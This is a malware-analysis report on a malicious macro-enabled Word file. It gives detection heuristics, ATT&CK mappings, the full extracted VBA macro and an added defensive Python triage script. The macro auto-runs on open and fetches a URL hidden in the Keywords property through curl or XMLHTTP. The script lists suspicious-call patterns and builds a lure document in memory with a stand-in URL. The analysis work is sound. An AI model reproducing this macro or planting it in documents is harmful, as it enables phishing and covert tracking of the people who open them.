Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 6d531826c0fa1d94…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 24.6 KB
Created: 2016-04-22 12:15:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2019-04-18
MD5: ca9c131552672b413631203169693c3b
SHA-1: b908b77b9602e3efc1a1fcf54ad205371148561c
SHA-256: 6d531826c0fa1d941433913ec42ae7aec3f99bbd64fd474eb59e547fa596b40c
Risk score: 322

Malware Insights

MITRE ATT&CK
  • T1566.001 Phishing: Spearphishing Attachment
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1105 Ingress Tool Transfer

The sample is a Word OOXML document carrying a VBA project with three auto-execution entry points: Auto_Open, AutoOpen and Workbook_Open. The last is an Excel event and does not fire when a Word document is opened; the two Word entry points are what run, and both lead to the same code since AutoOpen and Workbook_Open simply call Auto_Open. The document body is a lure asking the user to enable macros. The macro reads the document's built-in Keywords property, which holds a URL, and fetches it: on macOS through a declared libc system() call running "curl <url>", on Windows through a synchronous GET with a Microsoft.XMLHTTP object. The extracted code neither writes the response to disk nor executes it, so the behaviour visible in the macro is a single outbound request (the variable holding the URL is named tracker). ClamAV classifies the pattern as a generic document downloader, and T1105 is mapped on that basis. The Keywords value itself is not among the URLs listed below, which are all OOXML namespace identifiers; it has to be read from docProps/core.xml.

Heuristics (8)

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    The package contains word/vbaProject.bin, so VBA macros are present (see the extracted artifacts)
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    Word auto-execution entry point: runs when the document is opened with macros enabled
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Excel auto-execution entry point; present in the project but does not fire when a Word document is opened
  • Auto_Open macro high OLE_VBA_AUTO
    Auto-execution entry point; here it holds the fetch logic, and AutoOpen and Workbook_Open both call it
  • CreateObject call high OLE_VBA_CREATEOBJ
    Instantiates a COM object from VBA; here Microsoft.XMLHTTP, used to issue the outbound GET
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to get past Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL below is an OOXML XML namespace identifier declared in the document parts, not a network indicator; the URL the macro actually fetches is the Keywords value in docProps/core.xml and does not appear in this list.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 829 bytes
SHA-256: 5c7eb4cf5e68103ecece4d3179e77d60e5f0a799a7f236cb47fec5afe49d420d
Extracted VBA source (preview, up to the first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Mac Then
    Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long
#End If

Sub Auto_Open()
    Dim dp As Object
    Set dp = ActiveDocument.BuiltInDocumentProperties
    tracker = dp("KeyWords")
    
    #If Mac Then
        System ("curl " + tracker)
    #Else
        Dim req: Set req = CreateObject("Microsoft.XMLHTTP")
        req.Open "GET", tracker, False
        req.Send
    #End If
End Sub

Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 8704 bytes
SHA-256: fc0d3d775df65fd2fbb19ddb1094a51080ddfa3167d0b5b7f59cc9d7a09b3a6a
Detection: ClamAV: Doc.Downloader.Generic-6698421-0
Obfuscation or payload: unlikely
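The behaviour summarized in the analysis narrative and the macro listed above, carried through as an added offline triage script. This is example code written for this page, not the analysis platform's or oletools' own code. It builds a minimal macro-enabled document in memory (constructed input: the Keywords value http://tracker.example/doc-opened is an assumed stand-in, since the report does not disclose the real URL), scans the VBA text shown above for auto-exec entry points, flagged calls and document-property reads, resolves the property read against docProps/core.xml to recover the URL the macro fetches, and separates OOXML namespace identifiers from candidate network indicators. Decoding the MS-OVBA-compressed vbaProject.bin is left to olevba; the triage function takes the decoded VBA text as input.

```python
"""Offline OOXML triage for the behaviour this report describes (stdlib only).
Added example, not the analysis platform's or oletools' code. The document is
constructed in memory, TRACKER_URL stands in for the undisclosed Keywords value,
and the VBA text is passed in already decoded (olevba does that step)."""
import io, re, zipfile
import xml.etree.ElementTree as ET

# Hosts that only serve XML namespace identifiers: all of the report's
# "embedded URLs" are of this kind and none is a network indicator.
NAMESPACE_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com", "purl.org", "www.w3.org"}
# Procedures Office runs on its own (Workbook_Open is an Excel event and does
# not fire when a Word document is opened) and API calls worth flagging.
AUTOEXEC = ("Auto_Open", "AutoOpen", "Document_Open", "AutoExec", "Workbook_Open")
SUSPICIOUS_CALLS = ("CreateObject", "Microsoft.XMLHTTP", "MSXML2.XMLHTTP", "WinHttp", "Shell", "system", "curl")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

def is_namespace_uri(url):
    return re.match(r"https?://([^/]+)", url).group(1).lower() in NAMESPACE_HOSTS

def core_properties(zf):
    """docProps/core.xml as {local-name: text}, e.g. {"keywords": "..."}."""
    if "docProps/core.xml" not in zf.namelist():
        return {}
    root = ET.fromstring(zf.read("docProps/core.xml"))
    return {el.tag.rsplit("}", 1)[-1].lower(): (el.text or "").strip() for el in root}

def scan_vba(vba_src):
    """Auto-exec entry points, flagged calls and document properties the macro reads."""
    autoexec = [n for n in AUTOEXEC if re.search(
        r"^\s*(?:Private\s+|Public\s+)?Sub\s+" + re.escape(n) + r"\b", vba_src, re.M | re.I)]
    calls = [c for c in SUSPICIOUS_CALLS if re.search(r"\b" + re.escape(c) + r"\b", vba_src, re.I)]
    prop_reads = []
    if re.search(r"BuiltInDocumentProperties", vba_src, re.I):
        prop_reads = re.findall(r'\("(\w+)"\)', vba_src)  # e.g. dp("KeyWords")
    return autoexec, calls, prop_reads

def triage(docx_bytes, vba_src=""):
    zf = zipfile.ZipFile(io.BytesIO(docx_bytes))
    names = zf.namelist()
    autoexec, calls, prop_reads = scan_vba(vba_src)
    # The macro never embeds its URL: it reads a built-in property, so the
    # value is resolved from core.xml to recover the real indicator.
    props = core_properties(zf)
    resolved = {p: props.get(p.lower(), "") for p in prop_reads}
    body = zf.read("word/document.xml").decode("utf-8", "replace") if "word/document.xml" in names else ""
    visible_text = " ".join(re.findall(r"<w:t[^>]*>([^<]*)</w:t>", body))
    raw = [zf.read(n).decode("utf-8", "replace") for n in names if n.lower().endswith(".xml")]
    urls = list(dict.fromkeys(URL_RE.findall(" ".join(raw + [vba_src] + list(resolved.values())))))
    return {
        "has_vba_project": any(n.lower().endswith("vbaproject.bin") for n in names),
        "enable_lure": bool(re.search(r"enable (content|macros|editing)", visible_text, re.I)),
        "autoexec": autoexec,
        "suspicious_calls": calls,
        "property_reads": resolved,
        "namespace_uris": [u for u in urls if is_namespace_uri(u)],
        "network_iocs": [u for u in urls if not is_namespace_uri(u)],
    }

def build_sample_docx(keywords):
    """Minimal macro-enabled .docx built in memory (constructed input, not the real sample)."""
    parts = {
        "docProps/core.xml":
            '<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/'
            'metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/">'
            '<dc:creator>user</dc:creator><cp:keywords>' + keywords + '</cp:keywords></cp:coreProperties>',
        "word/document.xml":
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
            '<w:body><w:p><w:r><w:t>Protected document. Click Enable Content to view.</w:t>'
            '</w:r></w:p></w:body></w:document>',
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
        # OLE2 magic plus padding stands in for the real MS-OVBA container.
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + bytes(24))
    return buf.getvalue()

TRACKER_URL = "http://tracker.example/doc-opened"  # assumed; the real value is not disclosed
VBA_SAMPLE = '''Sub Auto_Open()
    Dim dp As Object
    Set dp = ActiveDocument.BuiltInDocumentProperties
    tracker = dp("KeyWords")
    #If Mac Then
        System ("curl " + tracker)
    #Else
        Dim req: Set req = CreateObject("Microsoft.XMLHTTP")
        req.Open "GET", tracker, False
        req.Send
    #End If
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
'''

def run_sample():
    """Triage the constructed document with the report's macro as the VBA input."""
    return triage(build_sample_docx(TRACKER_URL), VBA_SAMPLE)
```

Running run_sample() reproduces the report's findings and adds the piece the URL list misses: the only entry in network_iocs is the resolved Keywords value, while every schemas.* and purl.org URI lands in namespace_uris. Workbook_Open is still reported as an auto-exec name so that the same scan works on an Excel workbook; the comment on AUTOEXEC records that it does not fire in Word.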